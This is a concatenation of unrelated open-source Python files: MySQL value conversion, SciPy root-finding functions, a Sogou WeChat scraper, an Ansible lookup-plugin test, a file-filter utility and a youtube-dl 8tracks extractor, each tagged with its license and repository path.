vtype[0])) except TypeError as err: raise TypeError("%s (field %s)" % (err, vtype[0])) except: raise def _int_to_mysql(self, value): """Convert value to int""" return int(value) def _long_to_mysql(self, value): """Convert value to int""" return int(value) def _float_to_mysql(self, value): """Convert value to float""" return float(value) def _str_to_mysql(self, value): """Convert value to string""" if PY2: return str(value) return self._unicode_to_mysql(value) def _unicode_to_mysql(self, value): """Convert unicode""" charset = self.charset charset_id = self.charset_id if charset == 'binary': charset = 'utf8' charset_id = CharacterSet.get_charset_info(charset)[0] encoded = 
value.encode(charset) if charset_id in CharacterSet.slash_charsets: if b'\x5c' in encoded: return HexLiteral(value, charset) return encoded def _bytes_to_mysql(self, value): """Convert value to bytes""" return value def _bytearray_to_mysql(self, value): """Convert value to bytes""" return str(value) def _bool_to_mysql(self, value): """Convert value to boolean""" if value: return 1 else: return 0 def _nonetype_to_mysql(self, value): """ This would return what None would be in MySQL, but instead we leave it None and return it right away. The actual conversion from None to NULL happens in the quoting functionality. Return None. """ return None def _datetime_to_mysql(self, value): """ Converts a datetime instance to a string suitable for MySQL. The returned string has format: %Y-%m-%d %H:%M:%S[.%f] If the instance isn't a datetime.datetime type, it return None. Returns a bytes. """ if value.microsecond: fmt = '{0:d}-{1:02d}-{2:02d} {3:02d}:{4:02d}:{5:02d}.{6:06d}' return fmt.format( value.year, value.month, value.day, value.hour, value.minute, value.second, value.microsecond).encode('ascii') fmt = '{0:d}-{1:02d}-{2:02d} {3:02d}:{4:02d}:{5:02d}' return fmt.format( value.year, value.month, value.day, value.hour, value.minute, value.second).encode('ascii') def _date_to_mysql(self, value): """ Converts a date instance to a string suitable for MySQL. The returned string has format: %Y-%m-%d If the instance isn't a datetime.date type, it return None. Returns a bytes. """ return '{0:d}-{1:02d}-{2:02d}'.format(value.year, value.month, value.day).encode('ascii') def _time_to_mysql(self, value): """ Converts a time instance to a string suitable for MySQL. The returned string has format: %H:%M:%S[.%f] If the instance isn't a datetime.time type, it return None. Returns a bytes. 
""" if value.microsecond: return value.strftime('%H:%M:%S.%f').encode('ascii') return value.strftime('%H:%M:%S').encode('ascii') def _struct_time_to_mysql(self, value): """ Converts a time.struct_time sequence to a string suitable for MySQL. The returned string has format: %Y-%m-%d %H:%M:%S Returns a bytes or None when not valid. """ return time.strftime('%Y-%m-%d %H:%M:%S', value).encode('ascii') def _timedelta_to_mysql(self, value): """ Converts a timedelta instance to a string suitable for MySQL. The returned string has format: %H:%M:%S Returns a bytes. """ seconds = abs(value.days * 86400 + value.seconds) if value.microseconds: fmt = '{0:02d}:{1:02d}:{2:02d}.{3:06d}' if value.days < 0: mcs = 1000000 - value.microseconds seconds -= 1 else: mcs = value.microseconds else: fmt = '{0:02d}:{1:02d}:{2:02d}' if value.days < 0: fmt = '-' + fmt (hours, remainder) = divmod(seconds, 3600) (mins, secs) = divmod(remainder, 60) if value.microseconds: result = fmt.format(hours, mins, secs, mcs) else: result = fmt.format(hours, mins, secs) if PY2: return result else: return result.encode('ascii') def _decimal_to_mysql(self, value): """ Converts a decimal.Decimal instance to a string suitable for MySQL. Returns a bytes or None when not valid. """ if isinstance(value, Decimal): return str(value).encode('ascii') return None def row_to_python(self, row, fields): """Convert a MySQL text result row to Python types The row argument is a sequence containing text result returned by a MySQL server. Each value of the row is converted to the using the field type information in the fields argument. Returns a tuple. 
""" i = 0 result = [None]*len(fields) if not self._cache_field_types: self._cache_field_types = {} for name, info in FieldType.desc.items(): try: self._cache_field_types[info[0]] = getattr( self, '_{0}_to_python'.format(name)) except AttributeError: # We ignore field types which has no method pass for field in fields: field_type = field[1] if (row[i] == 0 and field_type != FieldType.BIT) or row[i] is None: # Don't convert NULL value i += 1 continue try: result[i] = self._cache_field_types[field_type](row[i], field) except KeyError: # If one type is not defined, we just return the value as str try: result[i] = row[i].decode('utf-8') except UnicodeDecodeError: result[i] = row[i] except (ValueError, TypeError) as err: err.message = "{0} (field {1})".format(str(err), field[0]) raise i += 1 return tuple(result) def _FLOAT_to_python(self, value, desc=None): # pylint: disable=C0103 """ Returns value as float type. """ return float(value) _DOUBLE_to_python = _FLOAT_to_python def _INT_to_python(self, value, desc=None): # pylint: disable=C0103 """ Returns value as int type. """ return int(value) _TINY_to_python = _INT_to_python _SHORT_to_python = _INT_to_python _INT24_to_python = _INT_to_python _LONG_to_python = _INT_to_python _LONGLONG_to_python = _INT_to_python def _DECIMAL_to_python(self, value, desc=None): # pylint: disable=C0103 """ Returns value as a decimal.Decimal. """ val = value.decode(self.charset) return Decimal(val) _NEWDECIMAL_to_python = _DECIMAL_to_python def _str(self, value, desc=None): """ Returns value as str type. """ return str(value) def _BIT_to_python(self, value, dsc=None): # pylint: disable=C0103 """Returns BIT columntype as integer""" int_val = value if len(int_val) < 8: int_val = b'\x00' * (8 - len(int_val)) + int_val return struct_unpack('>Q', int_val)[0] def _DATE_to_python(self, value, dsc=None): # pylint: disable=C0103 """ Returns DATE column type as datetime.date type. 
""" try: parts = value.split(b'-') return datetime.date(int(parts[0]), int(parts[1]), int(parts[2])) except ValueError: return None _NEWDATE_to_python = _DATE_to_python def _TIME_to_python(self, value, dsc=None): # pylint: disable=C0103 """ Returns TIME column type as datetime.time type. """ time_val = None try: (hms, mcs) = value.split(b'.') mcs = int(mcs.ljust(6, b'0')) except ValueError: hms = value mcs = 0 try: (hours, mins, secs) = [int(d) for d in hms.split(b':')] if value[0] == 45 or value[0] == '-': # if PY3 or PY2 mins, secs, mcs = -mins, -secs, -mcs time_val = datetime.timedelta(hours=hours, minutes=mins, seconds=secs, microseconds=mcs) except ValueError: raise ValueError( "Could not convert {0} to python datetime.timedelta".format( value)) else: return time_val def _DATETIME_to_python(self, value, dsc=None): # pylint: disable=C0103 """ Returns DATETIME column type as datetime.datetime type. """ datetime_val = None try: (date_, time_) = value.split(b' ') if len(time_) > 8: (hms, mcs) = time_.split(b'.') mcs = int(mcs.ljust(6, b'0')) else: hms = time_ mcs = 0 dtval = [int(i) for i in date_.split(b'-')] + \ [int(i) for i in hms.split(b':')] + [mcs, ] datetime_val = datetime.datetime(*dtval) except ValueError: datetime_val = None return datetime_val _TIMESTAMP_to_python = _DATETIME_to_python def _YEAR_to_python(self, value, desc=None): # pylint: disable=C0103 """Returns YEAR column type as integer""" try: year = int(value) except ValueError: raise ValueError("Failed converting YEAR to int (%s)" % value) return year def _SET_to_python(self, value, dsc=None): # pylint: disable=C0103 """Returns SET column type as set Actually, MySQL protocol sees a SET as a string type field. So this code isn't called directly, but used by STRING_to_python() method. Returns SET column type as a set. 
""" set_type = None val = value.decode(self.charset) if not val: return set() try: set_type = set(val.split(',')) except ValueError: raise ValueError("Could not convert set %s to a sequence." % value) return set_type def _STRING_to_python(self, value, dsc=None): # pylint: disable=C0103 """ Note that a SET is a string too, but using the FieldFlag we can see whether we have to split it. Returns string typed columns as string type. """ if dsc is not None: # Check if we deal with a SET if dsc[7] & FieldFlag.SET: return self._SET_to_python(value, dsc) if dsc[7] & FieldFlag.BINARY: return value if self.charset == 'binary': return value if isinstance(value, (bytes, bytearray)) and self.use_unicode: return value.decode(self.charset) return value _VAR_STRING_to_python = _STRING_to_python def _BLOB_to_python(self, value, dsc=None): # pylint: disable=C0103 """Convert BLOB data type to Python""" if dsc is not None: if dsc[7] & FieldFlag.BINARY: if PY2: return value else: return bytes(value) return self._STRING_to_python(value, dsc) _LONG_BLOB_to_python = _BLOB_to_python _MEDIUM_BLOB_to_python = _BLOB_to_python _TINY_BLOB_to_python = _BLOB_to_python
apache-2.0
keyurpatel076/MissionPlannerGit
Lib/site-packages/scipy/optimize/zeros.py
55
16072
import warnings import _zeros from numpy import finfo _iter = 100 _xtol = 1e-12 # not actually used at the moment _rtol = finfo(float).eps * 2 __all__ = ['newton', 'bisect', 'ridder', 'brentq', 'brenth'] CONVERGED = 'converged' SIGNERR = 'sign error' CONVERR = 'convergence error' flag_map = {0 : CONVERGED, -1 : SIGNERR, -2 : CONVERR} class RootResults(object): def __init__(self, root, iterations, function_calls, flag): self.root = root self.iterations = iterations self.function_calls = function_calls self.converged = flag == 0 try: self.flag = flag_map[flag] except KeyError: self.flag = 'unknown error %d' % (flag,) def results_c(full_output, r): if full_output: x, funcalls, iterations, flag = r results = RootResults(root=x, iterations=iterations, function_calls=funcalls, flag=flag) return x, results else: return r # Newton-Raphson method def newton(func, x0, fprime=None, args=(), tol=1.48e-8, maxiter=50): """Find a zero using the Newton-Raphson or secant method. Find a zero of the function `func` given a nearby starting point `x0`. The Newton-Rapheson method is used if the derivative `fprime` of `func` is provided, otherwise the secant method is used. Parameters ---------- func : function The function whose zero is wanted. It must be a function of a single variable of the form f(x,a,b,c...), where a,b,c... are extra arguments that can be passed in the `args` parameter. x0 : float An initial estimate of the zero that should be somewhere near the actual zero. fprime : {None, function}, optional The derivative of the function when available and convenient. If it is None, then the secant method is used. The default is None. args : tuple, optional Extra arguments to be used in the function call. tol : float, optional The allowable error of the zero value. maxiter : int, optional Maximum number of iterations. Returns ------- zero : float Estimated location where function is zero. See Also -------- brentq, brenth, ridder, bisect -- find zeroes in one dimension. 
fsolve -- find zeroes in n dimensions. Notes ----- The convergence rate of the Newton-Rapheson method is quadratic while that of the secant method is somewhat less. This means that if the function is well behaved the actual error in the estimated zero is approximatly the square of the requested tolerance up to roundoff error. However, the stopping criterion used here is the step size and there is no quarantee that a zero has been found. Consequently the result should be verified. Safer algorithms are brentq, brenth, ridder, and bisect, but they all require that the root first be bracketed in an interval where the function changes sign. The brentq algorithm is recommended for general use in one dimemsional problems when such an interval has been found. """ if fprime is not None: # Newton-Rapheson method # Multiply by 1.0 to convert to floating point. We don't use float(x0) # so it still works if x0 is complex. p0 = 1.0 * x0 for iter in range(maxiter): myargs = (p0,) + args fder = fprime(*myargs) if fder == 0: msg = "derivative was zero." warnings.warn(msg, RuntimeWarning) return p0 p = p0 - func(*myargs) / fder if abs(p - p0) < tol: return p p0 = p else: # Secant method p0 = x0 if x0 >= 0: p1 = x0*(1 + 1e-4) + 1e-4 else: p1 = x0*(1 + 1e-4) - 1e-4 q0 = func(*((p0,) + args)) q1 = func(*((p1,) + args)) for iter in range(maxiter): if q1 == q0: if p1 != p0: msg = "Tolerance of %s reached" % (p1 - p0) warnings.warn(msg, RuntimeWarning) return (p1 + p0)/2.0 else: p = p1 - q1*(p1 - p0)/(q1 - q0) if abs(p - p1) < tol: return p p0 = p1 q0 = q1 p1 = p q1 = func(*((p1,) + args)) msg = "Failed to converge after %d iterations, value is %s" % (maxiter, p) raise RuntimeError(msg) def bisect(f, a, b, args=(), xtol=_xtol, rtol=_rtol, maxiter=_iter, full_output=False, disp=True): """Find root of f in [a,b]. Basic bisection routine to find a zero of the function f between the arguments a and b. f(a) and f(b) can not have the same signs. Slow but sure. 
Parameters ---------- f : function Python function returning a number. f must be continuous, and f(a) and f(b) must have opposite signs. a : number One end of the bracketing interval [a,b]. b : number The other end of the bracketing interval [a,b]. xtol : number, optional The routine converges when a root is known to lie within xtol of the value return. Should be >= 0. The routine modifies this to take into account the relative precision of doubles. maxiter : number, optional if convergence is not achieved in maxiter iterations, and error is raised. Must be >= 0. args : tuple, optional containing extra arguments for the function `f`. `f` is called by ``apply(f, (x)+args)``. full_output : bool, optional If `full_output` is False, the root is returned. If `full_output` is True, the return value is ``(x, r)``, where `x` is the root, and `r` is a RootResults object. disp : {True, bool} optional If True, raise RuntimeError if the algorithm didn't converge. Returns ------- x0 : float Zero of `f` between `a` and `b`. r : RootResults (present if ``full_output = True``) Object containing information about the convergence. In particular, ``r.converged`` is True if the routine converged. See Also -------- brentq, brenth, bisect, newton : one-dimensional root-finding fixed_point : scalar fixed-point finder fsolve -- n-dimensional root-finding """ if type(args) != type(()) : args = (args,) r = _zeros._bisect(f,a,b,xtol,maxiter,args,full_output,disp) return results_c(full_output, r) def ridder(f, a, b, args=(), xtol=_xtol, rtol=_rtol, maxiter=_iter, full_output=False, disp=True): """ Find a root of a function in an interval. Parameters ---------- f : function Python function returning a number. f must be continuous, and f(a) and f(b) must have opposite signs. a : number One end of the bracketing interval [a,b]. b : number The other end of the bracketing interval [a,b]. xtol : number, optional The routine converges when a root is known to lie within xtol of the value return. 
Should be >= 0. The routine modifies this to take into account the relative precision of doubles. maxiter : number, optional if convergence is not achieved in maxiter iterations, and error is raised. Must be >= 0. args : tuple, optional containing extra arguments for the function `f`. `f` is called by ``apply(f, (x)+args)``. full_output : bool, optional If `full_output` is False, the root is returned. If `full_output` is True, the return value is ``(x, r)``, where `x` is the root, and `r` is a RootResults object. disp : {True, bool} optional If True, raise RuntimeError if the algorithm didn't converge. Returns ------- x0 : float Zero of `f` between `a` and `b`. r : RootResults (present if ``full_output = True``) Object containing information about the convergence. In particular, ``r.converged`` is True if the routine converged. See Also -------- brentq, brenth, bisect, newton : one-dimensional root-finding fixed_point : scalar fixed-point finder Notes ----- Uses [Ridders1979]_ method to find a zero of the function `f` between the arguments `a` and `b`. Ridders' method is faster than bisection, but not generally as fast as the Brent rountines. [Ridders1979]_ provides the classic description and source of the algorithm. A description can also be found in any recent edition of Numerical Recipes. The routine used here diverges slightly from standard presentations in order to be a bit more careful of tolerance. References ---------- .. [Ridders1979] Ridders, C. F. J. "A New Algorithm for Computing a Single Root of a Real Continuous Function." IEEE Trans. Circuits Systems 26, 979-980, 1979. """ if type(args) != type(()) : args = (args,) r = _zeros._ridder(f,a,b,xtol,maxiter,args,full_output,disp) return results_c(full_output, r) def brentq(f, a, b, args=(), xtol=_xtol, rtol=_rtol, maxiter=_iter, full_output=False, disp=True): """ Find a root of a function in given interval. Return float, a zero of `f` between `a` and `b`. 
`f` must be a continuous function, and [a,b] must be a sign changing interval. Description: Uses the classic Brent (1973) method to find a zero of the function `f` on the sign changing interval [a , b]. Generally considered the best of the rootfinding routines here. It is a safe version of the secant method that uses inverse quadratic extrapolation. Brent's method combines root bracketing, interval bisection, and inverse quadratic interpolation. It is sometimes known as the van Wijngaarden-Deker-Brent method. Brent (1973) claims convergence is guaranteed for functions computable within [a,b]. [Brent1973]_ provides the classic description of the algorithm. Another description can be found in a recent edition of Numerical Recipes, including [PressEtal1992]_. Another description is at http://mathworld.wolfram.com/BrentsMethod.html. It should be easy to understand the algorithm just by reading our code. Our code diverges a bit from standard presentations: we choose a different formula for the extrapolation step. Parameters ---------- f : function Python function returning a number. f must be continuous, and f(a) and f(b) must have opposite signs. a : number One end of the bracketing interval [a,b]. b : number The other end of the bracketing interval [a,b]. xtol : number, optional The routine converges when a root is known to lie within xtol of the value return. Should be >= 0. The routine modifies this to take into account the relative precision of doubles. maxiter : number, optional if convergence is not achieved in maxiter iterations, and error is raised. Must be >= 0. args : tuple, optional containing extra arguments for the function `f`. `f` is called by ``apply(f, (x)+args)``. full_output : bool, optional If `full_output` is False, the root is returned. If `full_output` is True, the return value is ``(x, r)``, where `x` is the root, and `r` is a RootResults object. disp : {True, bool} optional If True, raise RuntimeError if the algorithm didn't converge. 
Returns ------- x0 : float Zero of `f` between `a` and `b`. r : RootResults (present if ``full_output = True``) Object containing information about the convergence. In particular, ``r.converged`` is True if the routine converged. See Also -------- multivariate local optimizers `fmin`, `fmin_powell`, `fmin_cg`, `fmin_bfgs`, `fmin_ncg` nonlinear least squares minimizer `leastsq` constrained multivariate optimizers `fmin_l_bfgs_b`, `fmin_tnc`, `fmin_cobyla` global optimizers `anneal`, `brute` local scalar minimizers `fminbound`, `brent`, `golden`, `bracket` n-dimensional root-finding `fsolve` one-dimensional root-finding `brentq`, `brenth`, `ridder`, `bisect`, `newton` scalar fixed-point finder `fixed_point` Notes ----- f must be continuous. f(a) and f(b) must have opposite signs. .. [Brent1973] Brent, R. P., *Algorithms for Minimization Without Derivatives*. Englewood Cliffs, NJ: Prentice-Hall, 1973. Ch. 3-4. .. [PressEtal1992] Press, W. H.; Flannery, B. P.; Teukolsky, S. A.; and Vetterling, W. T. *Numerical Recipes in FORTRAN: The Art of Scientific Computing*, 2nd ed. Cambridge, England: Cambridge University Press, pp. 352-355, 1992. Section 9.3: "Van Wijngaarden-Dekker-Brent Method." """ if type(args) != type(()) : args = (args,) r = _zeros._brentq(f,a,b,xtol,maxiter,args,full_output,disp) return results_c(full_output, r) def brenth(f, a, b, args=(), xtol=_xtol, rtol=_rtol, maxiter=_iter, full_output=False, disp=True): """Find root of f in [a,b]. A variation on the classic Brent routine to find a zero of the function f between the arguments a and b that uses hyperbolic extrapolation instead of inverse quadratic extrapolation. There was a paper back in the 1980's ... f(a) and f(b) can not have the same signs. Generally on a par with the brent routine, but not as heavily tested. It is a safe version of the secant method that uses hyperbolic extrapolation. The version here is by Chuck Harris. Parameters ---------- f : function Python function returning a number. 
f must be continuous, and f(a) and f(b) must have opposite signs. a : number One end of the bracketing interval [a,b]. b : number The other end of the bracketing interval [a,b]. xtol : number, optional The routine converges when a root is known to lie within xtol of the value return. Should be >= 0. The routine modifies this to take into account the relative precision of doubles. maxiter : number, optional if convergence is not achieved in maxiter iterations, and error is raised. Must be >= 0. args : tuple, optional containing extra arguments for the function `f`. `f` is called by ``apply(f, (x)+args)``. full_output : bool, optional If `full_output` is False, the root is returned. If `full_output` is True, the return value is ``(x, r)``, where `x` is the root, and `r` is a RootResults object. disp : {True, bool} optional If True, raise RuntimeError if the algorithm didn't converge. Returns ------- x0 : float Zero of `f` between `a` and `b`. r : RootResults (present if ``full_output = True``) Object containing information about the convergence. In particular, ``r.converged`` is True if the routine converged. See Also -------- fmin, fmin_powell, fmin_cg, fmin_bfgs, fmin_ncg -- multivariate local optimizers leastsq -- nonlinear least squares minimizer fmin_l_bfgs_b, fmin_tnc, fmin_cobyla -- constrained multivariate optimizers anneal, brute -- global optimizers fminbound, brent, golden, bracket -- local scalar minimizers fsolve -- n-dimensional root-finding brentq, brenth, ridder, bisect, newton -- one-dimensional root-finding fixed_point -- scalar fixed-point finder """ if type(args) != type(()) : args = (args,) r = _zeros._brenth(f,a, b, xtol, maxiter, args, full_output, disp) return results_c(full_output, r)
gpl-3.0
lotosbin/weixin_sogou
weixin_sogou.py
8
5775
from selenium import webdriver import selenium from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from bs4 import BeautifulSoup import requests import logging import re import time from urllib.parse import quote import random BASE_URL = 'http://weixin.sogou.com' UA = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" def get_html(url): dcap = dict(DesiredCapabilities.PHANTOMJS) dcap["phantomjs.page.settings.userAgent"] = ( UA ) dcap["takesScreenshot"] = (False) #t0 = time.time() try: driver = webdriver.PhantomJS(desired_capabilities=dcap, service_args=['--load-images=no']) driver.set_page_load_timeout(240) driver.command_executor._commands['executePhantomScript'] = ('POST', '/session/$sessionId/phantom/execute') driver.execute('executePhantomScript', {'script': ''' var page = this; // won't work otherwise page.onResourceRequested = function(requestData, request) { if ((/http:\/\/.+?\.css/gi).test(requestData['url']) || requestData['Content-Type'] == 'text/css') { console.log('The url of the request is matching. 
Aborting: ' + requestData['url']); request.abort(); } } ''', 'args': []}) except selenium.common.exceptions.WebDriverException: return None try: driver.get(url) html = driver.page_source except Exception as e: html = None logging.error(e) finally: driver.quit() return html def get_html_direct(url,cookies=None): if not cookies: cookies = update_cookies() headers = {"User-Agent": UA} r = requests.get(url, headers=headers, cookies=cookies, timeout=20) return r.text def get_account_info(open_id=None, link=None, cookies=None): url = None if open_id: url = BASE_URL + '/gzh?openid=' + open_id if link: url = link #html = get_html(url) html = get_html_direct(url, cookies=cookies) #print(html) if not html: return None soup = BeautifulSoup(html) info_box = soup.select('#weixinname')[0].parent account_info = {} account_info['account'] = info_box.select('h4 span')[0].text.split(':')[1].strip() account_info['name'] = info_box.select('#weixinname')[0].text account_info['address'] = url account_info['description'] = info_box.select('.sp-txt')[0].text img_list = soup.select('.pos-box img') account_info['logo'] = soup.select(".img-box img")[0]['src'] account_info['qr_code'] = img_list[1]['src'] return account_info def parse_list(open_id=None, link=None): if open_id: url = BASE_URL + '/gzh?openid=' + open_id elif link: url = link else: return None html = get_html(url) if not html: return None soup = BeautifulSoup(html) ls = soup.select('#wxbox .txt-box') link_list = [] for item in ls: item_dict = {} item_dict['title'] = item.a.text item_dict['link'] = item.a['href'] link_list.append(item_dict) return link_list def parse_essay(link): s = requests.Session() s.headers.update({"User-Agent": UA}) try: r = s.get(link) html = r.text soup = BeautifulSoup(html) essay = {} p = re.compile(r'\?wx_fmt.+?\"') content = str(soup.select("#js_content")[0]).replace('data-src', 'src') essay['content'] = re.sub(p, '"', content) essay['name'] = soup.select('#post-user')[0].text essay['date'] = 
soup.select('#post-date')[0].text except Exception: return None return essay def weixin_search(name, cookies=None): url = BASE_URL + '/weixin?query=' + name #html = get_html(url) html = get_html_direct(url, cookies=cookies) print(html) soup = BeautifulSoup(html) ls = soup.select("._item") search_list = [] for item in ls: account_info = {} account_info['account'] = item.select('h4 span')[0].text.split(':')[1].strip() account_info['name'] = item.select('.txt-box h3')[0].text account_info['address'] = BASE_URL + item['href'] account_info['open_id'] = item['href'].split('openid=')[1] account_info['description'] = item.select('.sp-txt')[0].text account_info['logo'] = item.select('.img-box img')[0]['src'] try: account_info['latest_title'] = item.select('.sp-txt a')[0].text account_info['latest_link'] = item.select('.sp-txt a')[0]['href'] except IndexError: pass search_list.append(account_info) #print(account_info) return search_list def update_cookies(): s = requests.Session() headers = {"User-Agent": UA} s.headers.update(headers) url = BASE_URL + '/weixin?query=123' r = s.get(url) if 'SNUID' not in s.cookies: p = re.compile(r'(?<=SNUID=)\w+') s.cookies['SNUID'] = p.findall(r.text)[0] suv = ''.join([str(int(time.time()*1000000) + random.randint(0, 1000))]) s.cookies['SUV'] = suv return s.cookies if __name__ == '__main__': open_id = 'oIWsFt3nvJ2jaaxm9UOB_LUos02k' #print(weixin_search('简书')) cookies = update_cookies() t0 = time.time() print(get_account_info(open_id,cookies=cookies)) #print(weixin_search("简书",cookies)) t1 = time.time() print(parse_list(open_id)) t2 = time.time() print(parse_essay('http://mp.weixin.qq.com/s?__biz=MjM5NjM4OTAyMA==&mid=205212599&idx=4&sn=6a1de7a7532ba0bcbc633c253b61916f&3rd=MzA3MDU4NTYzMw==&scene=6#rd')) t3 = time.time() print(t1-t0, t2-t1, t3-t2)
mit
anryko/ansible
test/units/plugins/lookup/test_avi.py
23
3126
# -*- coding: utf-8 -*- # (c) 2019, Sandeep Bandi <sandeepb@avinetworks.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import pytest import json from units.compat.mock import patch, MagicMock from ansible.errors import AnsibleError from ansible.plugins.loader import lookup_loader from ansible.plugins.lookup import avi try: import builtins as __builtin__ except ImportError: import __builtin__ fixture_path = os.path.join(os.path.dirname(__file__), 'fixtures') with open(fixture_path + '/avi.json') as json_file: data = json.load(json_file) @pytest.fixture def dummy_credentials(): dummy_credentials = {} dummy_credentials['controller'] = "192.0.2.13" dummy_credentials['username'] = "admin" dummy_credentials['password'] = "password" dummy_credentials['api_version'] = "17.2.14" dummy_credentials['tenant'] = 'admin' return dummy_credentials @pytest.fixture def super_switcher(scope="function", autouse=True): # Mocking the inbuilt super as it is used in ApiSession initialization original_super = __builtin__.super __builtin__.super = MagicMock() yield # Revert the super to default state __builtin__.super = original_super def test_lookup_multiple_obj(dummy_credentials): avi_lookup = lookup_loader.get('avi') avi_mock = MagicMock() 
avi_mock.return_value.get.return_value.json.return_value = data["mock_multiple_obj"] with patch.object(avi, 'ApiSession', avi_mock): retval = avi_lookup.run([], {}, avi_credentials=dummy_credentials, obj_type="network") assert retval == data["mock_multiple_obj"]["results"] def test_lookup_single_obj(dummy_credentials): avi_lookup = lookup_loader.get('avi') avi_mock = MagicMock() avi_mock.return_value.get_object_by_name.return_value = data["mock_single_obj"] with patch.object(avi, 'ApiSession', avi_mock): retval = avi_lookup.run([], {}, avi_credentials=dummy_credentials, obj_type="network", obj_name='PG-123') assert retval[0] == data["mock_single_obj"] def test_invalid_lookup(dummy_credentials): avi_lookup = lookup_loader.get('avi') avi_mock = MagicMock() with pytest.raises(AnsibleError): with patch.object(avi, 'ApiSession', avi_mock): avi_lookup.run([], {}, avi_credentials=dummy_credentials)
gpl-3.0
EHRI/rspub-core
rspub/util/resourcefilter.py
2
1207
#! /usr/bin/env python3 # -*- coding: utf-8 -*- import os import re import dateutil.parser def hidden_file_predicate(): # in Python 3.5 this should work # return lambda file_path : bool(os.stat(file_path).st_file_attributes & os.stat.FILE_ATTRIBUTE_HIDDEN) return lambda file_path: isinstance(file_path, str) and os.path.basename(file_path).startswith(".") def directory_pattern_predicate(name_pattern=""): pattern = re.compile(windows_to_unix(name_pattern)) return lambda file_path: isinstance(file_path, str) and pattern.search(windows_to_unix(os.path.dirname(file_path))) def windows_to_unix(path): return path.replace("\\", "/") def filename_pattern_predicate(name_pattern=""): pattern = re.compile(name_pattern) return lambda file_path: isinstance(file_path, str) and pattern.search(os.path.basename(file_path)) def last_modified_after_predicate(t=0): if isinstance(t, str): t = dateutil.parser.parse(t).timestamp() def _file_attribute_filter(file_path): if not os.path.exists(file_path): return False else: lm = os.stat(file_path).st_mtime return lm > t return _file_attribute_filter
apache-2.0
hsluo/youtube-dl
youtube_dl/extractor/eighttracks.py
121
5868
# coding: utf-8 from __future__ import unicode_literals import json import random from .common import InfoExtractor from ..compat import ( compat_str, ) from ..utils import ( ExtractorError, ) class EightTracksIE(InfoExtractor): IE_NAME = '8tracks' _VALID_URL = r'https?://8tracks\.com/(?P<user>[^/]+)/(?P<id>[^/#]+)(?:#.*)?$' _TEST = { "name": "EightTracks", "url": "http://8tracks.com/ytdl/youtube-dl-test-tracks-a", "info_dict": { 'id': '1336550', 'display_id': 'youtube-dl-test-tracks-a', "description": "test chars: \"'/\\ä↭", "title": "youtube-dl test tracks \"'/\\ä↭<>", }, "playlist": [ { "md5": "96ce57f24389fc8734ce47f4c1abcc55", "info_dict": { "id": "11885610", "ext": "m4a", "title": "youtue-dl project<>\"' - youtube-dl test track 1 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "4ab26f05c1f7291ea460a3920be8021f", "info_dict": { "id": "11885608", "ext": "m4a", "title": "youtube-dl project - youtube-dl test track 2 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "d30b5b5f74217410f4689605c35d1fd7", "info_dict": { "id": "11885679", "ext": "m4a", "title": "youtube-dl project as well - youtube-dl test track 3 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "4eb0a669317cd725f6bbd336a29f923a", "info_dict": { "id": "11885680", "ext": "m4a", "title": "youtube-dl project as well - youtube-dl test track 4 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "1893e872e263a2705558d1d319ad19e8", "info_dict": { "id": "11885682", "ext": "m4a", "title": "PH - youtube-dl test track 5 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "b673c46f47a216ab1741ae8836af5899", "info_dict": { "id": "11885683", "ext": "m4a", "title": "PH - youtube-dl test track 6 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "1d74534e95df54986da7f5abf7d842b7", "info_dict": { "id": "11885684", "ext": "m4a", "title": "phihag - youtube-dl test track 7 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } }, { "md5": "f081f47af8f6ae782ed131d38b9cd1c0", "info_dict": { 
"id": "11885685", "ext": "m4a", "title": "phihag - youtube-dl test track 8 \"'/\\\u00e4\u21ad", "uploader_id": "ytdl" } } ] } def _real_extract(self, url): playlist_id = self._match_id(url) webpage = self._download_webpage(url, playlist_id) data = self._parse_json( self._search_regex( r"(?s)PAGE\.mix\s*=\s*({.+?});\n", webpage, 'trax information'), playlist_id) session = str(random.randint(0, 1000000000)) mix_id = data['id'] track_count = data['tracks_count'] duration = data['duration'] avg_song_duration = float(duration) / track_count # duration is sometimes negative, use predefined avg duration if avg_song_duration <= 0: avg_song_duration = 300 first_url = 'http://8tracks.com/sets/%s/play?player=sm&mix_id=%s&format=jsonh' % (session, mix_id) next_url = first_url entries = [] for i in range(track_count): api_json = None download_tries = 0 while api_json is None: try: api_json = self._download_webpage( next_url, playlist_id, note='Downloading song information %d/%d' % (i + 1, track_count), errnote='Failed to download song information') except ExtractorError: if download_tries > 3: raise else: download_tries += 1 self._sleep(avg_song_duration, playlist_id) api_data = json.loads(api_json) track_data = api_data['set']['track'] info = { 'id': compat_str(track_data['id']), 'url': track_data['track_file_stream_url'], 'title': track_data['performer'] + ' - ' + track_data['name'], 'raw_title': track_data['name'], 'uploader_id': data['user']['login'], 'ext': 'm4a', } entries.append(info) next_url = 'http://8tracks.com/sets/%s/next?player=sm&mix_id=%s&format=jsonh&track_id=%s' % ( session, mix_id, track_data['id']) return { '_type': 'playlist', 'entries': entries, 'id': compat_str(mix_id), 'display_id': playlist_id, 'title': data.get('name'), 'description': data.get('description'), }
unlicense
noba3/KoTos
addons/script.module.pyamf/lib/pyamf/tests/gateway/test_django.py
26
6094
